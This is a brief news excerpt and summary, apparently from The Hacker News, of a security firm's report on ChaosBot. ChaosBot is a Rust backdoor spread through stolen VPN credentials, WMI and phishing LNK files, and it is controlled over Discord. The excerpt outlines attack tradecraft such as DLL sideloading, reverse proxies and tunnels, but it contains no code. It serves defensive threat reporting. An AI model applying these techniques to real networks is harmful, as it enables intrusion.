""Threat actors leveraged compromised credentials that mapped to both Cisco VPN and an over-privileged Active Directory account named, 'serviceaccount,' eSentire said in a technical report published last week. "Using the compromised account, they leveraged WMI to execute remote commands across systems in the network, facilitating the deployment and execution of ChaosBot." The Canadian cybersecurity company said it first detected the malware in late September 2025 within a financial services customer's environment.""
""It gets its name from a Discord profile maintained by the threat actor behind it, who goes by the online moniker "chaos_00019" and is responsible for issuing remote commands to the infected devices. A second Discord user account associated with C2 operations is lovebb0024. Alternatively, the malware has also been observed relying on phishing messages containing a malicious Windows shortcut (LNK) file as a distribution vector.""
ChaosBot is a Rust-based backdoor that enables reconnaissance, arbitrary command execution, and persistent access on compromised Windows hosts. Operators gained initial access using compromised Cisco VPN credentials and an over-privileged Active Directory account named 'serviceaccount', then used WMI for remote execution and deployment. The malware uses Discord accounts (chaos_00019 and lovebb0024) for command-and-control and has been distributed via phishing with malicious LNK files that trigger PowerShell to download the payload while displaying a decoy PDF. The payload is a sideloaded DLL named msedge_elf.dll launched via identity_helper.exe, which performs reconnaissance and deploys an FRP reverse proxy. Attackers also attempted to configure a Visual Studio Code Tunnel for additional access. Detection occurred in late September 2025 in a financial services environment.
Read at The Hacker News
Unable to calculate read time
Collection
[
|
...
]